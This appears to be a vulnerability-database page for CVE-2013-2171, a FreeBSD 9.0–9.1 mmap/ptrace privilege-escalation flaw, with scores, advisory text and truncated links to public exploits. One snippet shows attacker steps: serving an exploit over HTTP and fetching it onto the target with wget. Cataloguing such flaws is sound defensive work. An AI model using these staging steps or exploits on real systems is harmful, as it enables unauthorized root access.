Published: 02/07/2013 Updated: 18/03/2019

CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4

VMScore: 701

Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 up to and including 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.

Vulnerable Product	Search on Vulmon	Subscribe to Product
freebsd freebsd 9.0
freebsd freebsd 9.1

Konstantin Belousov and Alan Cox discovered that insufficient permission checks in the memory management of the FreeBSD kernel could lead to privilege escalation For the stable distribution (wheezy), this problem has been fixed in version 90-10+deb702 For the unstable distribution (sid), this problem has been fixed in version 90-12 We recomme ...

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # web site for more information on licensing and terms of use # metasploitcom/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::E ...

/* * FreeBSD 9{0,1} mmap/ptrace exploit * by Hunger <fbsd9lul@hungerhu> * * Happy Birthday FreeBSD! * Now you are 20 years old and your security is the same as 20 years ago :) * * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof, * sd, sghctoma, snq, spender, s2crew and others at #hekkcamp: ...

This Metasploit module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation Systems such as FreeBSD 90 and 91 are known to be vulnerable ...

FreeBSD 90+ privilege escalation exploit that leverages the mmap vulnerability ...

This exploits performs privilege escalation leveraging the mmap vulnerability in FreeBSD 91 as described in FreeBSD-SA-13:06 ...

CVE-2013-2171

FreeBSD-90-91 - Privilege-Escalation CVE-2013-2171 By fbsd9lul@hungerhu How to Exploit! 1° Check the kernel version uname -a FreeBSD freebsd 90-RELEASE FreeBSD 90-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 2° Transfer this file to target Attacker machine -> python3 -m httpserver 8080 Target machine -> wget IP:8

CVE-2013-2171

FreeBSD-90-91 - Privilege-Escalation CVE-2013-2171 By fbsd9lul@hungerhu How to Exploit! 1° Check the kernel version uname -a FreeBSD freebsd 90-RELEASE FreeBSD 90-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 2° Transfer this file to target Attacker machine -> python3 -m httpserver 8080 Target machine -> wget IP:8

Investigation Report for the September 2014 Equation malware detection incident in the US

Securelist • Kaspersky Lab • 16 Nov 2017

In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were tr...

CVE-2013-2171

Vulnerability Summary

Vendor Advisories

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect